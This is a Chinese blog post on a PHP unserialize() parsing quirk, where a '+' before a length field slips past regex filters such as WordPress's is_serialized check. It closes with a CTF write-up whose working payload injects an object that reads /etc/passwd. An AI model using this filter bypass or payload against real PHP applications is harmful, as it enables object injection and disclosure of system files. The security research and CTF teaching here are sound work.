最新消息:

php反序列unserialize的一个小特性与利用

php安全 admin 2229浏览 0评论

一、unserialize()函数特性

wordpress存在一个反序列漏洞比较火,具体漏洞可以看这篇:http://drops.wooyun.org/papers/596,
也可以去看英文的原文:http://vagosec.org/2013/09/wordpress-php-object-injection/。

wp官网打了补丁,我试图去bypass补丁,但让我自以为成功的时候,发现我天真了,并没有成功绕过wp的补丁,但却发现了unserialize的一个小特性,在此和大家分享一下。

1.unserialize()函数相关源码

if ((YYLIMIT - YYCURSOR) < 7) YYFILL(7);
        yych = *YYCURSOR;
        switch (yych) {
        case 'C':
        case 'O':        goto yy13;
        case 'N':        goto yy5;
        case 'R':        goto yy2;
        case 'S':        goto yy10;
        case 'a':        goto yy11;
        case 'b':        goto yy6;
        case 'd':        goto yy8;
        case 'i':        goto yy7;
        case 'o':        goto yy12;
        case 'r':        goto yy4;
        case 's':        goto yy9;
        case '}':        goto yy14;
        default:        goto yy16;
        }

上边这段代码是判断序列串的处理方式,如序列串O:4:”test”:1:{s:1:”a”;s:3:”aaa”;},处理这个序列串,先获取字符串第一个字符为O,然后case ‘O’:  goto yy13

yy13:
        yych = *(YYMARKER = ++YYCURSOR);
        if (yych == ':') goto yy17;
        goto yy3;

从上边代码看出,指针移动一位指向第二个字符,判断字符是否为:,然后 goto yy17

yy17:
        yych = *++YYCURSOR;
        if (yybm[0+yych] & 128) {
                goto yy20;
        }
        if (yych == '+') goto yy19;

.......

yy19:
        yych = *++YYCURSOR;
        if (yybm[0+yych] & 128) {
                goto yy20;
        }
        goto yy18;

从上边代码看出,指针移动,判断下一位字符,如果字符是数字直接goto yy20,如果是’+’就goto yy19,而yy19中是对下一位字符判断,如果下一位字符是数字goto yy20,不是就goto yy18,yy18是直接退出序列处理,yy20是对object性的序列的处理,所以从上边可以看出

都能够被unserialize反序列化,且结果相同。  2.实际测试:

<?php
var_dump(unserialize('O:+4:"test":1:{s:1:"a";s:3:"aaa";}'));
var_dump(unserialize('O:4:"test":1:{s:1:"a";s:3:"aaa";}'));
?>

输出:

object(__PHP_Incomplete_Class)#1 (2) { ["__PHP_Incomplete_Class_Name"]=> string(4) "test" ["a"]=> string(3) "aaa" }
object(__PHP_Incomplete_Class)#1 (2) { ["__PHP_Incomplete_Class_Name"]=> string(4) "test" ["a"]=> string(3) "aaa" }

其实,不光object类型处理可以多一个’+’,其他类型也可以,具体测试不做过多描述

3.我们看下wp的补丁

function is_serialized( $data, $strict = true ) {
        // if it isn't a string, it isn't serialized
        if ( ! is_string( $data ) )
                return false;
        $data = trim( $data );
         if ( 'N;' == $data )
                return true;
        $length = strlen( $data );
        if ( $length < 4 )
                return false;
        if ( ':' !== $data[1] )
                return false;
        if ( $strict ) {//output
                $lastc = $data[ $length - 1 ];
                if ( ';' !== $lastc && '}' !== $lastc )
                        return false;
        } else {//input
                $semicolon = strpos( $data, ';' );
                $brace     = strpos( $data, '}' );
                // Either ; or } must exist.
                if ( false === $semicolon && false === $brace )
                        return false;
                // But neither must be in the first X characters.
                if ( false !== $semicolon && $semicolon < 3 )
                        return false;
                if ( false !== $brace && $brace < 4 )
                        return false;
        }
        $token = $data[0];
        switch ( $token ) {
                case 's' :
                        if ( $strict ) {
                                if ( '"' !== $data[ $length - 2 ] )
                                        return false;
                        } elseif ( false === strpos( $data, '"' ) ) {
                                return false;
                        }
                case 'a' :
                case 'O' :
                        echo "a";
                        return (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );
                case 'b' :
                case 'i' :
                case 'd' :
                        $end = $strict ? '$' : '';
                        return (bool) preg_match( "/^{$token}:[0-9.E-]+;$end/", $data );
        }
        return false;
}

补丁中的

return (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );

可以多一个’+’来绕过,虽然我们通过这个方法把序列值写入了数据库,但从数据库中提取数据,再次验证的时候却没法绕过了,我这个加号没能使数据进出数据库发生任何变化,我个人认为这个补丁绕过重点在于数据进出数据的前后变化。

4.总结
虽然没有绕过wp补丁,但这个unserialize()的小特性可能会被很多开发人员忽略,导致程序出现安全缺陷。
以上的分析有什么错误请留言指出。

5.参考
《WordPress < 3.6.1 PHP Object Injection》
http://vagosec.org/2013/09/wordpress-php-object-injection/
《var_unserializer.c源码》
https://github.com/php/php-src/blob/73cd2e0ab14d804c6bf0b689490bdd4fd6e969b1/ext/standard/var_unserializer.c
《PHP string序列化与反序列化语法解析不一致带来的安全隐患》
http://zone.wooyun.org/content/1664

 

二、特性利用

如某道ctf的题就考了上面通过+来绕过对对象序列化的过滤,题目如下:

 

QQ截图20150104200803

其中源代码如下:

<!--
#GOAL: get /etc/passwd 	: )

    class just4fun {
        public $filename;

        function __toString() {
           
            return @file_get_contents($this->filename);
            
        }
    }

    $data = stripslashes($_GET['data']);
    if (!$data) {
    	die("hello from y");
    }
 
    $token = $data[0];
    $pass = true; 

    switch ( $token ) {
        case 'a' :
        case 'O' :
        case 'b' :
        case 'i' :
        case 'd' :
            $pass = ! (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );
            break;

        default:
            $pass = false;
    }

    if (!$pass) {
      die("TKS L.N.");
    }
    
    echo unserialize($data); 

-->

可以看到只要通过$data传入序列化的just4fun类的对象(对象的$filename值为/etc/passwd)就可以达到读取/etc/passwd文件的目的,但是发现传入序列化的对象

O:8:"just4fun":1:{s:8:"filename";s:11:"/etc/passwd";}

并不能读取文件内容,因为上面php代码在将序列化对象传入unserialize()之前有一个过滤的过程:

    $token = $data[0];
    $pass = true; 

    switch ( $token ) {
        case 'a' :
        case 'O' :
        case 'b' :
        case 'i' :
        case 'd' :
            $pass = ! (bool) preg_match( "/^{$token}:[0-9]+:/s", $data );
            break;

        default:
            $pass = false;
    }

    if (!$pass) {
      die("TKS L.N.");
    }

上面代码中过滤的最关键处就是:$pass = ! (bool) preg_match( “/^{$token}:[0-9]+:/s”, $data );,即如果传入的$data变量符合正则”/^{$token}:[0-9]+:/s”,就会跑到die(“TKS L.N.”);去,而不会执行unserialize()函数。要绕过该正则的限制,可以利用上面讲的+特性,即

O:+4:"test":1:{s:1:"a";s:3:"aaa";}
O:4:"test":1:{s:1:"a";s:3:"aaa";}

都能够被unserialize反序列化,且结果相同。

因此,获取/etc/passwd的payload是:

O:%2b8:"just4fun":1:{s:8:"filename";s:11:"/etc/passwd";}

ps:要对+进行url编码。

QQ截图20150104202105

 

参考资料:

1、php反序列unserialize的一个小特性

2、PHP string序列化与反序列化语法解析不一致带来的安全隐患

转载请注明:jinglingshu的博客 » php反序列unserialize的一个小特性与利用


Warning: Use of undefined constant PRC - assumed 'PRC' (this will throw an Error in a future version of PHP) in /usr/share/nginx/html/wp-content/themes/d8/comments.php on line 17
发表我的评论
取消评论

表情

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址